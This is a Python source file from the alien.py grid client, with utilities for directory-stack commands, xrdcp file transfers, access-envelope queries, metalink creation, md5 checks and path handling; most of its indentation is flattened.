utc_time = datetime.datetime.fromtimestamp(int(unixtime), datetime.timezone.utc)
local_time = utc_time.astimezone()
if decimals and millis:
return f'{(local_time + millis).strftime("%Y-%m-%d %H:%M:%S")}.{time_decimals}{local_time.strftime("%z")}'
if decimals and micros:
return (local_time + micros).strftime("%Y-%m-%d %H:%M:%S.%f%z") # (%Z)"))
return local_time.strftime("%Y-%m-%d %H:%M:%S%z") # (%Z)"))
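# Example (illustrative, output depends on the local timezone):
# unixtime2local('1609459200123') -> '2021-01-01 01:00:00.123+0100' on a CET host;
# a 13-digit input is split into 10-digit seconds plus millisecond decimals.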
def convert_time(str_line: str) -> str:
"""Convert the first 10 digit unix time like string from str argument to a nice time"""
timestamp = re.findall(r"^(\d{10}) \[.*", str_line)
if timestamp:
nice_timestamp = f"{PrintColor(COLORS.BIGreen)}{unixtime2local(timestamp[0])}{PrintColor(COLORS.ColorReset)}"
return str_line.replace(str(timestamp[0]), nice_timestamp)
return ''
def cd(wb, args: Union[str, list] = None, opts: str = '') -> RET:
"""Override cd to add to home and to prev functions"""
if args is None: args = []
if isinstance(args, str): args = args.split()
if is_help(args): return get_help_srv(wb, 'cd')
if args:
if args[0] == '-': args = [AlienSessionInfo['prevdir']]
if 'nocheck' not in opts and AlienSessionInfo['currentdir'].rstrip('/') == args[0].rstrip('/'): return RET(0)
return SendMsg(wb, 'cd', args, opts)
def push2stack(path: str):
if not path: return
global AlienSessionInfo
home = AlienSessionInfo['alienHome'][:-1] if AlienSessionInfo['alienHome'] else ''
if home and home in path: path = path.replace(home, '~')
AlienSessionInfo['pathq'].appendleft(path)
def deque_pop_pos(dq: deque, pos: int = 1) -> str:
if abs(pos) > len(dq) - 1: return ''
pos = - pos
dq.rotate(pos)
if pos > 0:
val = dq.pop()
if len(dq) > 1: dq.rotate(- (pos - 1))
else:
val = dq.popleft()
if len(dq) > 1: dq.rotate(abs(pos) - 1)
return val
def list_remove_item(target_list: list, item_list):
target_list[:] = [el for el in target_list if el != item_list]
def get_arg(target: list, item) -> bool:
"""Remove inplace all instances of item from list and return True if found"""
len_begin = len(target)
list_remove_item(target, item)
len_end = len(target)
return len_begin != len_end
def get_arg_value(target: list, item):
"""Remove inplace all instances of item and item+1 from list and return item+1"""
val = None
for x in target:
if x == item:
val = target.pop(target.index(x) + 1)
target.pop(target.index(x))
return val
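# Example (illustrative): args = ['-s', '10', 'read']; get_arg_value(args, '-s')
# returns '10' and leaves args == ['read']; get_arg(args, 'read') then returns
# True and empties the list.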
def get_arg_2values(target: list, item):
"""Remove inplace all instances of item, item+1 and item+2 from list and return item+1, item+2"""
val1 = val2 = None
for x in target:
if x == item:
val2 = target.pop(target.index(x) + 2)
val1 = target.pop(target.index(x) + 1)
target.pop(target.index(x))
return (val1, val2)
def DO_dirs(wb, args: Union[str, list, None] = None) -> RET:
"""dirs"""
return DO_path_stack(wb, 'dirs', args)
def DO_popd(wb, args: Union[str, list, None] = None) -> RET:
"""popd"""
return DO_path_stack(wb, 'popd', args)
def DO_pushd(wb, args: Union[str, list, None] = None) -> RET:
"""pushd"""
return DO_path_stack(wb, 'pushd', args)
def DO_path_stack(wb, cmd: str = '', args: Union[str, list, None] = None) -> RET:
"""Implement dirs/popd/pushd for directory stack manipulation"""
if not cmd: return RET(1)
if args is None: return RET(1)
global AlienSessionInfo
arg_list = args.split() if isinstance(args, str) else args
do_not_cd = False
if '-n' in arg_list:
do_not_cd = True
arg_list.remove('-n')
msg = ''
help_msg = ('The following syntax is required\n'
'dirs [-clpv] [+N | -N]\n'
'popd [-n] [+N | -N]\n'
'pushd [-n] [+N | -N | dir]')
if (cmd != 'dirs' and len(arg_list) > 1) or (cmd == 'dirs' and len(arg_list) > 2) or is_help(arg_list):
return RET(1, '', help_msg)
sign = None
position = None
pos = None
for arg in arg_list:
if arg[0] == '+' or arg[0] == '-':
sign = arg[0]
if not arg[1:].isdecimal(): return RET(1, '', "-N | +N argument is invalid")
position = int(arg[1:])
arg_list.remove(arg)
pos = int(arg)
if cmd == "dirs":
if '-c' in arg_list:
AlienSessionInfo['pathq'].clear()
return RET(0)
if not arg_list: msg = ' '.join(AlienSessionInfo['pathq'])
if position and sign:
if position > len(AlienSessionInfo['pathq']) - 1: return RET(0)
if sign == "+":
msg = AlienSessionInfo['pathq'][position] # Nth position from top (the last/top element has index 0)
if sign == "-":
msg = AlienSessionInfo['pathq'][len(AlienSessionInfo['pathq']) - 1 - position] # Nth position from last
return RET(0, msg) # end of dirs
if cmd == "popd":
if position and sign:
if position > len(AlienSessionInfo['pathq']) - 1: return RET(0)
deque_pop_pos(AlienSessionInfo['pathq'], pos)
msg = " ".join(AlienSessionInfo['pathq'])
return RET(0, msg)
if not arg_list:
AlienSessionInfo['pathq'].popleft()
if not do_not_cd: cd(wb, AlienSessionInfo['pathq'][0]) # cd to the new top of stack
msg = " ".join(AlienSessionInfo['pathq'])
return RET(0, msg) # end of popd
if cmd == "pushd":
if position and sign:
if position > len(AlienSessionInfo['pathq']) - 1: return RET(0)
if sign == "+":
AlienSessionInfo['pathq'].rotate(-1 * position)
if not do_not_cd: cd(wb, AlienSessionInfo['pathq'][0], 'log') # cd to the new top of stack
if sign == "-":
AlienSessionInfo['pathq'].rotate(-(len(AlienSessionInfo['pathq']) - 1 - position))
if not do_not_cd: cd(wb, AlienSessionInfo['pathq'][0], 'log') # cd to the new top of stack
msg = " ".join(AlienSessionInfo['pathq'])
return RET(0, msg) # end of +N|-N
if not arg_list:
if len(AlienSessionInfo['pathq']) < 2: return RET(0)
old_cwd = AlienSessionInfo['pathq'].popleft()
new_cwd = AlienSessionInfo['pathq'].popleft()
push2stack(old_cwd)
push2stack(new_cwd)
if not do_not_cd: cd(wb, AlienSessionInfo['pathq'][0], 'log')
msg = " ".join(AlienSessionInfo['pathq'])
return RET(0, msg) # end of +N|-N
path = expand_path_grid(wb, arg_list[0])
if do_not_cd:
cwd = AlienSessionInfo['pathq'].popleft()
push2stack(path)
push2stack(cwd)
else:
push2stack(path)
cd(wb, AlienSessionInfo['pathq'][0], 'log') # cd to the new top of stack
msg = " ".join(AlienSessionInfo['pathq'])
return RET(0, msg) # end of +N|-N
return RET() # dummy return just in case cmd is not proper
def DO_version(args: Union[list, None] = None) -> RET: # pylint: disable=unused-argument
stdout = (f'alien.py version: {ALIENPY_VERSION_STR}\n'
f'alien.py version date: {ALIENPY_VERSION_DATE}\n'
f'alien.py location: {os.path.realpath(__file__)}\n'
f'script location: {ALIENPY_EXECUTABLE}\n'
f'Interpreter: {os.path.realpath(sys.executable)}\n'
f'Python version: {sys.version}\n')
if _HAS_XROOTD:
stdout = f'{stdout}XRootD version: {xrd_client.__version__}\nXRootD path: {xrd_client.__file__}'
else:
stdout = f'{stdout}XRootD version: Not Found!'
return RET(0, stdout, "")
def DO_exit(args: Union[list, None] = None) -> RET:
if args is None: args = []
if len(args) > 0 and args[0] == '-h':
msg = 'Command format: exit [code] [stderr|err] [message]'
return RET(0, msg)
code = AlienSessionInfo['exitcode']
msg = ''
if len(args) > 0:
if args[0].isdecimal(): code = int(args.pop(0))
if args and (args[0] == 'stderr' or args[0] == 'err'):
args.pop(0)
print2stdout = sys.stderr
msg = ' '.join(args).strip()
if msg:
if code != 0: print_err(msg)
else: print_out(msg)
sys.exit(int(code))
def xrdcp_help() -> str:
helpstr = f'''Command format is of the form of (with the strict order of arguments):
cp <options> src dst
or
cp <options> -input input_file
where src|dst are local files if prefixed with file:// or file: or grid files otherwise
and -input argument is a file with >src dst< pairs
after each src,dst can be added comma separated specifiers in the form of: @disk:N,SE1,SE2,!SE3
where disk selects the number of replicas and the following specifiers add (or remove) storage endpoints from the received list
options are the following :
-h : print help
-f : replace destination file (if destination is local it will be replaced only if integrity check fails)
-P : enable persist on successful close semantic
-cksum : check hash sum of the file; for downloads the central catalogue md5 will be verified
-y <nr_sources> : use up to the number of sources specified in parallel (N.B. Ignored as it breaks download of files stored in archives)
-S <additional TPC streams> : uses num additional parallel streams to do the transfer. (max = 15)
-chunks <nr chunks> : number of chunks that should be requested in parallel
-chunksz <bytes> : chunk size (bytes)
-T <nr_copy_jobs> : number of parallel copy jobs from a set (for recursive copy); defaults to 8 for downloads
-timeout <seconds> : the job will fail if it did not finish in this nr of seconds
-retry <times> : retry N times the copy process if failed
-ratethreshold <bytes/s> : fail the job if the speed is lower than specified bytes/s
-noxrdzip: circumvent the XRootD mechanism of zip member copy and download the archive and locally extract the intended member.
N.B.!!! for recursive copy (all files) the same archive will be downloaded for each member.
If there are problems with native XRootD zip mechanism, download only the zip archive and locally extract the contents
for the recursive copy of directories the following options (of the find command) can be used:
-glob <globbing pattern> : this is the usual AliEn globbing format; {PrintColor(COLORS.BIGreen)}N.B. this is NOT a REGEX!!!{PrintColor(COLORS.ColorReset)} defaults to all "*"
-select <pattern> : select only these files to be copied; {PrintColor(COLORS.BIGreen)}N.B. this is a REGEX applied to full path!!!{PrintColor(COLORS.ColorReset)}
-name <pattern> : select only these files to be copied; {PrintColor(COLORS.BIGreen)}N.B. this is a REGEX applied to a directory or file name!!!{PrintColor(COLORS.ColorReset)}
-name <verb>_string : where verb = begin|contain|ends|ext and string is the text selection criteria.
verbs are additive : -name begin_myf_contain_run1_ends_bla_ext_root
{PrintColor(COLORS.BIRed)}N.B. the text to be filtered cannot have an underscore <_> within!!!{PrintColor(COLORS.ColorReset)}
-parent <parent depth> : in destination use this <parent depth> to add to destination ; defaults to 0
-a : copy also the hidden files .* (for recursive copy)
-j <queue_id> : select only the files created by the job with <queue_id> (for recursive copy)
-l <count> : copy only <count> nr of files (for recursive copy)
-o <offset> : skip first <offset> files found in the src directory (for recursive copy)'''
return helpstr
def _xrdcp_sysproc(cmdline: str, timeout: Union[str, int, None] = None) -> RET:
"""xrdcp stanalone system command"""
if not cmdline: return RET(1, '', '_xrdcp_sysproc :: no cmdline')
if timeout is not None: timeout = int(timeout)
# --nopbar --posc
xrdcp_cmdline = f'xrdcp -N -P {cmdline}'
return runShellCMD(xrdcp_cmdline, captureout = True, do_shell = False, timeout = timeout)
def _xrdcp_copyjob(wb, copy_job: CopyFile, xrd_cp_args: XrdCpArgs, printout: str = '') -> int:
"""xrdcp based task that process a copyfile and it's arguments"""
if not copy_job: return
overwrite = xrd_cp_args.overwrite
batch = xrd_cp_args.batch
sources = xrd_cp_args.sources
chunks = xrd_cp_args.chunks
chunksize = xrd_cp_args.chunksize
makedir = xrd_cp_args.makedir
tpc = xrd_cp_args.tpc
posc = xrd_cp_args.posc
# hashtype = xrd_cp_args.hashtype
streams = xrd_cp_args.streams
cksum = xrd_cp_args.cksum
timeout = xrd_cp_args.timeout
rate = xrd_cp_args.rate
cmdline = f'{copy_job.src} {copy_job.dst}'
return retf_print(_xrdcp_sysproc(cmdline, timeout))
def XrdCopy_xrdcp(wb, job_list: list, xrd_cp_args: XrdCpArgs, printout: str = '') -> list:
"""XRootD copy command :: the actual XRootD copy process"""
if not _HAS_XROOTD:
print_err("XRootD not found or lower version thant 5.3.3")
return []
if not xrd_cp_args:
print_err("cp arguments are not set, XrdCpArgs tuple missing")
return []
overwrite = xrd_cp_args.overwrite
batch = xrd_cp_args.batch
makedir = xrd_cp_args.makedir
# ctx = mp.get_context('forkserver')
# q = ctx.JoinableQueue()
# p = ctx.Process(target=_xrdcp_copyjob, args=(q,))
# p.start()
# print(q.get())
# p.join()
for copy_job in job_list:
if _DEBUG: logging.debug("\nadd copy job with\nsrc: {0}\ndst: {1}\n".format(copy_job.src, copy_job.dst))
xrdcp_cmd = f' {copy_job.src} {copy_job.dst}'
if _DEBUG: print_out(copy_job)
return []
def lfnAccessUrl(wb, lfn: str, local_file: str = '', specs: Union[None, list, str] = None, isWrite: bool = False, strictspec: bool = False, httpurl: bool = False) -> dict:
"""Query central services for the access envelope of a lfn, it will return a lfn:server answer with envelope pairs"""
if not wb: return {}
if not lfn: return {}
if not specs: specs = []
if specs and isinstance(specs, str): specs = specs_split.split(specs)
if isWrite:
if not local_file or not os.path.exists(local_file):
print_err(f'lfnAccessUrl/write token:: invalid local file: {local_file}')
return {}
access_type = 'write'
size = int(os.stat(local_file).st_size)
md5sum = md5(local_file)
files_with_default_replicas = ['.sh', '.C', '.jdl', '.xml']
if any(lfn.endswith(ext) for ext in files_with_default_replicas) and size < 1048576: # we have a special lfn
if not specs: specs.append('disk:4') # if no specs defined then default to disk:4
get_envelope_arg_list = ['-s', size, '-m', md5sum, access_type, lfn]
if not specs: specs.append('disk:2') # hard default if nothing is specified
else:
access_type = 'read'
get_envelope_arg_list = [access_type, lfn]
if specs: get_envelope_arg_list.append(",".join(specs))
if httpurl: get_envelope_arg_list.insert(0, '-u')
if strictspec: get_envelope_arg_list.insert(0, '-f')
ret_obj = SendMsg(wb, 'access', get_envelope_arg_list, opts = 'nomsg')
if ret_obj.exitcode != 0 or 'results' not in ret_obj.ansdict:
ret_obj = ret_obj._replace(err = f'No token for {lfn} :: errno {ret_obj.exitcode} -> {ret_obj.err}')
retf_print(ret_obj, opts = 'err noprint')
return {}
return ret_obj.ansdict
def lfn2uri(wb, lfn: str, local_file: str = '', specs: Union[None, list, str] = None, isWrite: bool = False, strictspec: bool = False, httpurl: bool = False) -> str:
"""Return the list of access URIs for all replica of an ALICE lfn - can be used directly with xrdcp"""
result = lfnAccessUrl(wb, lfn, local_file, specs, isWrite, strictspec, httpurl)
if not result: return ''
output_list = []
for replica in result['results']:
output_list.append(repr(f"{replica['url']}?xrd.wantprot=unix&authz={replica['envelope']}"))
return '\n'.join(output_list)
def lfn2meta(wb, lfn: str, local_file: str = '', specs: Union[None, list, str] = None, isWrite: bool = False, strictspec: bool = False, httpurl: bool = False) -> str:
"""Create metafile for download of an ALICE lfn and return it's location - can be used directly with xrdcp"""
if isWrite:
print_err('Metafile creation possible only for download')
return ''
result = lfnAccessUrl(wb, lfn, local_file, specs, isWrite, strictspec, httpurl)
if not result: return ''
# pprint(result)
size_4meta = result['results'][0]['size'] # size SHOULD be the same for all replicas
md5_4meta = result['results'][0]['md5'] # the md5 hash SHOULD be the same for all replicas
file_in_zip = None
url_list_4meta = []
for replica in result['results']:
url_components = replica['url'].rsplit('#', maxsplit = 1)
if len(url_components) > 1: file_in_zip = url_components[1]
# if is_pfn_readable(url_components[0]): # it is a lot cheaper to check readability of replica than to try and fail a non-working replica
url_list_4meta.append(f'{url_components[0]}?xrd.wantprot=unix&authz={replica["envelope"]}')
# Create the metafile as a temporary uuid5 named file (the lfn can be retrieved from meta if needed)
metafile = create_metafile(make_tmp_fn(lfn, '.meta4', uuid5 = True), lfn, local_file, size_4meta, md5_4meta, url_list_4meta)
if not metafile:
print_err(f"Could not create the download metafile for {lfn}")
return ''
subprocess.run(shlex.split(f'mv {metafile} {os.getcwd()}/')) # keep it in local directory
metafile = os.path.realpath(os.path.basename(metafile))
if file_in_zip and 'ALIENPY_NOXRDZIP' not in os.environ:
return f'{metafile}?xrdcl.unzip={file_in_zip}'
else:
return f'{metafile}'
def lfn2fileTokens(wb, arg_lfn2file: lfn2file, specs: Union[None, list, str] = None, isWrite: bool = False, strictspec: bool = False, httpurl: bool = False) -> dict:
"""Query central services for the access envelope of a lfn, it will return a lfn:server answer with envelope pairs"""
if not wb: return {}
if not arg_lfn2file: return {}
lfn = arg_lfn2file.lfn
file = arg_lfn2file.file
if not specs: specs = []
if specs and isinstance(specs, str): specs = specs_split.split(specs)
result = lfnAccessUrl(wb, lfn, file, specs, isWrite, strictspec, httpurl)
if not result:
return {"lfn": lfn, "answer": {}}
qos_tags = [el for el in specs if 'ALICE::' not in el] # for element in specs, if not ALICE:: then is qos tag
SEs_list_specs = [el for el in specs if 'ALICE::' in el] # explicit requests of SEs
SEs_list_total = [replica["se"] for replica in result["results"]]
# let's save for each replica the original request info
for replica in result["results"]:
replica["qos_specs"] = qos_tags # qos tags from specs
replica["SElist_specs"] = SEs_list_specs # SE from specs
replica["SElist"] = SEs_list_total # list of SEs that were used
replica["file"] = file
replica["lfn"] = lfn
return {"lfn": lfn, "answer": result}
def lfn2fileTokens_list(wb, input_lfn_list: list, specs: Union[None, list, str] = None, isWrite: bool = False, strictspec: bool = False, httpurl: bool = False) -> list:
"""Query central services for the access envelope of the list of lfns, it will return a list of lfn:server answer with envelope pairs"""
if not wb: return []
access_list = []
if not input_lfn_list: return access_list
if specs is None: specs = []
for l2f in input_lfn_list: access_list.append(lfn2fileTokens(wb, l2f, specs, isWrite, strictspec, httpurl))
return access_list
def expand_path_local(path_input: str, check_path: bool = False, check_writable: bool = False) -> str:
"""Given a string representing a local file, return a full path after interpretation of HOME location, current directory, . and .. and making sure there are only single /"""
exp_path = None
try:
exp_path = Path(path_input).expanduser().resolve().as_posix()
except RuntimeError:
print_err(f"Loop encountered along the resolution of {path_input}")
if exp_path is None: return ''
if os.path.exists(exp_path):
is_dir = os.path.isdir(exp_path)
is_file = os.path.isfile(exp_path)
if is_dir:
exp_path = f'{exp_path}/'
if check_writable and not os.access(exp_path, os.W_OK): return '' # checking for writable dir
else:
if check_path: return ''
if path_input.endswith('/'): exp_path = f'{exp_path}/'
return exp_path
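# Illustrative usage sketch, not part of the original module: '~' expands to the
# user's home directory and an existing directory gains a trailing slash.
def _example_expand_path_local() -> None:
    home = expand_path_local('~')
    assert home.endswith('/')  # HOME exists and is a directory
    assert expand_path_local('~/..').endswith('/')  # '..' is resolved before the checks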
def expand_path_grid(wb, path_input: str, check_path: bool = False, check_writable: bool = False) -> str:
"""Given a string representing a GRID file (lfn), return a full path after interpretation of AliEn HOME location, current directory, . and .. and making sure there are only single /"""
exp_path = path_input
exp_path = lfn_prefix_re.sub('', exp_path)
exp_path = re.sub(r"^\/*\%ALIEN[\/\s]*", AlienSessionInfo['alienHome'], exp_path) # replace %ALIEN token with user grid home directory
if exp_path == '.': exp_path = AlienSessionInfo['currentdir']
if exp_path == '~': exp_path = AlienSessionInfo['alienHome']
if exp_path.startswith('./'): exp_path = exp_path.replace('.', AlienSessionInfo['currentdir'], 1)
if exp_path.startswith('~/'): exp_path = exp_path.replace('~', AlienSessionInfo['alienHome'], 1) # replace ~ for the usual meaning
if not exp_path.startswith('/'): exp_path = f'{AlienSessionInfo["currentdir"]}/{exp_path}' # if not full path add current directory to the referenced path
is_dir = exp_path.endswith('/')
exp_path = os.path.normpath(exp_path)
if is_dir: exp_path = f'{exp_path}/'
if check_path:
ret_obj = SendMsg(wb, 'stat', [exp_path], opts = 'nomsg log')
if ret_obj.exitcode != 0: return ''
file_stat = ret_obj.ansdict["results"][0] # stat can query and return multiple results, but we are using only one
exp_path = get_lfn_key(file_stat)
if not exp_path:
logging.error("expand_path_grid:: {exp_path} stat have no lfn nor file key!!")
return ''
path_type = file_stat["type"]
if check_writable and path_type == "d":
writable_user = writable_group = writable_others = False
perms = file_stat["perm"]
p_user = int(perms[0])
p_group = int(perms[1])
p_others = int(perms[2])
path_owner = file_stat["owner"]
path_gowner = file_stat["gowner"]
if AlienSessionInfo['user'] == path_owner and p_user in (6, 7): writable_user = True
if AlienSessionInfo['user'] == path_gowner and p_group in (6, 7): writable_group = True
if p_others in (6, 7): writable_others = True
if not (writable_user or writable_group or writable_others): return ''
return exp_path
def pathtype_grid(wb, path: str) -> str:
"""Query if a lfn is a file or directory, return f, d or empty"""
if not wb: return ''
if not path: return ''
ret_obj = SendMsg(wb, 'type', [path], opts = 'nomsg log')
if ret_obj.exitcode != 0: return ''
return str(ret_obj.ansdict['results'][0]["type"])[0]
def pathtype_local(path: str) -> str:
"""Query if a local path is a file or directory, return f, d or empty"""
if not path: return ''
p = Path(path)
if p.is_dir(): return 'd'
if p.is_file(): return 'f'
return ''
def fileIsValid(file: str, size: Union[str, int], reported_md5: str) -> RET:
"""Check if the file path is consistent with the size and md5 argument. N.B.! the local file will be deleted with size,md5 not match"""
global AlienSessionInfo
if os.path.isfile(file): # first check
if int(os.stat(file).st_size) != int(size):
os.remove(file)
return RET(1, '', f'{file} : Removed (invalid size)')
if md5(file) != reported_md5:
os.remove(file)
return RET(1, '', f'{file} : Removed (invalid md5 hash)')
return RET(0, f'{file} --> TARGET VALID')
return RET(2, '', f'{file} : No such file') # ENOENT
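# Illustrative sketch, not part of the original module: fileIsValid confirms a
# freshly written temporary file against its own size and md5, then we clean up.
def _example_fileIsValid() -> None:
    import tempfile
    with tempfile.NamedTemporaryFile(delete = False) as tmp:
        tmp.write(b'data')
    ret = fileIsValid(tmp.name, 4, md5(tmp.name))
    assert ret.exitcode == 0  # size and md5 match, so the file is kept
    os.remove(tmp.name)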
def create_metafile(meta_filename: str, lfn: str, local_filename: str, size: Union[str, int], md5in: str, replica_list: Union[None, list] = None) -> str:
"""Generate a meta4 xrootd virtual redirector with the specified location and using the rest of arguments"""
if not (meta_filename and replica_list): return ''
try:
with open(meta_filename, 'w') as f:
published = str(datetime.datetime.now().replace(microsecond=0).isoformat())
f.write('<?xml version="1.0" encoding="UTF-8"?>\n')
f.write(' <metalink xmlns="urn:ietf:params:xml:ns:metalink">\n')
f.write(" <published>{}</published>\n".format(published))
f.write(" <file name=\"{}\">\n".format(local_filename))
f.write(" <lfn>{}</lfn>\n".format(lfn))
f.write(" <size>{}</size>\n".format(size))
if md5in: f.write(" <hash type=\"md5\">{}</hash>\n".format(md5in))
for url in replica_list:
f.write(" <url><![CDATA[{}]]></url>\n".format(url))
f.write(' </file>\n')
f.write(' </metalink>\n')
return meta_filename
except Exception:
logging.error(traceback.format_exc())
return ''
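# Illustrative sketch, not part of the original module: write a metalink for a
# hypothetical lfn with a single (fake) replica URL and show the produced XML.
def _example_create_metafile() -> None:
    import tempfile
    meta_fn = os.path.join(tempfile.gettempdir(), 'example.meta4')
    meta = create_metafile(meta_fn, '/alice/cern.ch/user/t/test/f.root', '/tmp/f.root', 1024, '0' * 32, ['root://se.example.ch:1094//02/12345/guid-f.root'])
    if meta:
        with open(meta) as f:
            print(f.read())  # <metalink> with <lfn>, <size>, an md5 <hash> and CDATA-wrapped <url> entries
        os.remove(meta)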
def md5(file: str) -> str:
"""Compute the md5 digest of the specified file"""
import hashlib
BLOCKSIZE = 65536
hasher = hashlib.md5()
with open(file, 'rb') as f:
buf = f.read(BLOCKSIZE)
while len(buf) > 0:
hasher.update(buf)
buf = f.read(BLOCKSIZE)
return hasher.hexdigest()
def format_dst_fn(src_dir, src_file, dst, parent):
"""Return the destination filename given the source dir/name, destination directory and number of parents to keep"""
# let's get destination file name (relative path with parent value)
if src_dir != src_file: # recursive operation
total_relative_path = src_file.replace(src_dir, '', 1)
src_dir_path = Path(src_dir)
src_dir_parts = list(src_dir_path.parts) # Path.parts is a tuple, make it a mutable list
if not src_dir.endswith('/'): src_dir_parts = src_dir_parts[:-1]
src_dir = '/'.join(map(lambda x: str(x or ''), src_dir_parts))
src_dir = src_dir.replace('//', '/')
components_list = src_dir.split('/')
components_list[0] = '/' # first slash is lost in split
file_components = len(components_list) # number of components in the directory path
if parent >= file_components: parent = file_components # make sure parent points at most to the first dir in path
parent_selection = components_list[(file_components - parent):]
rootdir_src_dir = '/'.join(parent_selection)
file_relative_name = f'{rootdir_src_dir}/{total_relative_path}'
else:
src_file_path = Path(src_file)
file_components = len(src_file_path.parts) - 1 - 1 # directory components, without the file name and the root /
if parent >= file_components: parent = file_components # make sure parent points at most to the first dir in path
rootdir_src_file = src_file_path.parents[parent].as_posix()
file_relative_name = src_file.replace(rootdir_src_file, '', 1)
dst_file = f'{dst}/{file_relative_name}' if dst.endswith('/') else dst
dst_file = re.sub(r"\/{2,}", "/", dst_file)
return dst_file
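# Illustrative sketch, not part of the original module: destination names for
# hypothetical paths, showing how parent keeps source path components.
def _example_format_dst_fn() -> None:
    assert format_dst_fn('/alice/sim/', '/alice/sim/run1/f.root', '/tmp/data/', 0) == '/tmp/data/run1/f.root'
    assert format_dst_fn('/alice/sim/', '/alice/sim/run1/f.root', '/tmp/data/', 1) == '/tmp/data/sim/run1/f.root'
    assert format_dst_fn('/alice/sim/f.root', '/alice/sim/f.root', '/tmp/', 0) == '/tmp/f.root'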
def setDst(file: str = '', parent: int = 0) -> str:
"""For a given file path return the file path keeping the <parent> number of components"""
p = Path(file)
path_components = len(p.parts)
if parent >= (path_components - 1): parent = path_components - 1 - 1 # if parent >= number of components without the filename, clamp it to the components without / and filename
basedir = p.parents[parent].as_posix()
if basedir == '/': return file
return p.as_posix().replace(basedir, '', 1)
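# Illustrative sketch, not part of the original module: setDst keeps the last
# <parent> directory components in front of the file name (values hypothetical).
def _example_setDst() -> None:
    assert setDst('/a/b/c/file.txt', 0) == '/file.txt'
    assert setDst('/a/b/c/file.txt', 1) == '/c/file.txt'
    assert setDst('/a/b/c/file.txt', 9) == '/a/b/c/file.txt'  # clamped, full path kept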
def commit(wb, tokenstr: str, size: int, lfn: str, perm: str, expire: str, pfn: str, se: str, guid: str, md5sum: str) -> RET:
"""Upon succesful xrootd upload to server, commit the guid name into central catalogue"""
if not wb: return RET()
return SendMsg(wb, 'commit', [tokenstr, int(size), lfn, perm, expire, pfn, se, guid, md5sum], opts = 'log')
def commitFile(wb, lfnInfo: CommitInfo) -> RET:
"""Upon succesful xrootd upload to server, commit the guid name into central catalogue"""
if not wb or not lfnInfo: return RET()
return SendMsg(wb, 'commit', [lfnInfo.envelope, int(lfnInfo.size), lfnInfo.lfn, lfnInfo.perm, lfnInfo.expire, lfnInfo.pfn, lfnInfo.se, lfnInfo.guid, lfnInfo.md5], opts = 'log')
def commitFileList(wb, lfnInfo_list: list) -> list: # returns list of RET
"""Upon succesful xrootd upload to server, commit the guid name into central catalogue for a list of pfns"""
if not wb or not lfnInfo_list: return [] # keep the advertised list return type
batch_size = 30
batches_list = [lfnInfo_list[x:x+batch_size] for x in range(0, len(lfnInfo_list), batch_size)]
commit_results = []
for batch in batches_list:
commit_list = []
for file_commit in batch:
jsoncmd = CreateJsonCommand('commit', [file_commit.envelope, int(file_commit.size), file_commit.lfn, \
file_commit.perm, file_commit.expire, file_commit.pfn, file_commit.se, \
file_commit.guid, file_commit.md5], \
'nokeys')
commit_list.append(jsoncmd)
commit_results.extend(SendMsgMulti(wb, commit_list, 'log'))
return commit_results
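# Illustrative sketch, not part of the original module: the slicing used above
# turns a long job list into fixed-size batches (the last one possibly shorter).
def _example_commit_batching() -> None:
    batch_size = 30
    items = list(range(70))
    batches = [items[x:x + batch_size] for x in range(0, len(items), batch_size)]
    assert [len(b) for b in batches] == [30, 30, 10]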
def file_set_atime(path: str):
"""Set atime of file to now"""
if not os.path.isfile(path): return
file_stat = os.stat(path)
os.utime(path, (datetime.datetime.now().timestamp(), file_stat.st_mtime))
def GetHumanReadable(size, precision = 2):
"""Convert bytes to higher units"""
suffixes = ['B', 'KiB', 'MiB', 'GiB']
suffixIndex = 0
while size > 1024 and suffixIndex < len(suffixes) - 1: # do not run past the last known suffix
suffixIndex += 1 # increment the index of the suffix
size = size/1024.0 # apply the division
return '%.*f %s' % (precision, size, suffixes[suffixIndex])
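# Illustrative sketch, not part of the original module: a few conversions.
def _example_GetHumanReadable() -> None:
    assert GetHumanReadable(1536) == '1.50 KiB'
    assert GetHumanReadable(3 * 1024 ** 3) == '3.00 GiB'
    assert GetHumanReadable(512, precision = 0) == '512 B'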
def valid_regex(regex_str: str) -> Union[None, REGEX_PATTERN_TYPE]:
"""Validate a regex string and return a re.Pattern if valid"""
regex = None
try:
regex = re.compile(regex_str.encode('unicode-escape').decode()) # try not to hit https://docs.python.org/3.6/howto/regex.html#the-backslash-plague
except re.error:
logging.error(f"regex validation failed:: {regex_str}")
return regex
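# Illustrative sketch, not part of the original module: a valid pattern yields a
# compiled object, an invalid one yields None (and an entry in the log).
def _example_valid_regex() -> None:
    assert valid_regex(r'.*\.root$') is not None
    assert valid_regex('[unclosed') is None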
def name2regex(pattern_regex: str = '') -> str:
"""Translate a _<verb>_<string> name selection (verbs: begin, contain, ends, ext) into a regex string"""
if not pattern_regex: return ''
translated_pattern_regex = ''
re_all = '.*'
re_all_end = '[^/]*'
verbs = ('begin', 'contain', 'ends', 'ext')
pattern_list = pattern_regex.split('_')
if any(verb in pattern_regex for verb in verbs):
if pattern_list.count('begin') > 1 or pattern_list.count('ends') > 1 or pattern_list.count('ext') > 1:
print_out('<begin>, <ends>, <ext> verbs cannot appear more than once in the name selection')
return ''
list_begin = []
list_contain = []
list_ends = []
list_ext = []
for idx, tokenstr in enumerate(pattern_list):
if tokenstr == 'begin': list_begin.append(KV(tokenstr, pattern_list[idx + 1]))
if tokenstr == 'contain': list_contain.append(KV(tokenstr, pattern_list[idx + 1]))
if tokenstr == 'ends': list_ends.append(KV(tokenstr, pattern_list[idx + 1]))
if tokenstr == 'ext': list_ext.append(KV(tokenstr, pattern_list[idx + 1]))
if list_begin:
translated_pattern_regex = re_all + '/' + f'{list_begin[0].val}{re_all_end}' # first string after the last slash (last match exclude /)
for patt in list_contain:
if not list_begin: translated_pattern_regex = f'{re_all}'
translated_pattern_regex = f'{translated_pattern_regex}{patt.val}{re_all_end}'
if list_ends:
translated_pattern_regex = f'{translated_pattern_regex}{list_ends[0].val}{re_all_end}'
if list_ext:
translated_pattern_regex = translated_pattern_regex + "\\." + list_ext[0].val
if translated_pattern_regex:
if list_ext:
translated_pattern_regex = f'{translated_pattern_regex}' + '$'
else:
translated_pattern_regex = f'{translated_pattern_regex}{re_all_end}' + '$'
return translated_pattern_regex
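# Illustrative sketch, not part of the original module: translation of the
# verb mini-language into a regex string (hypothetical selection strings).
def _example_name2regex() -> None:
    assert name2regex('begin_AO_ext_root') == r'.*/AO[^/]*\.root$'
    assert name2regex('contain_pass1_ext_root') == r'.*pass1[^/]*\.root$'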
def gid2name(gid: Union[str, int]) -> str:
"""From the list of all groups return the name of gid"""
return str(grp.getgrgid(int(gid)).gr_name)
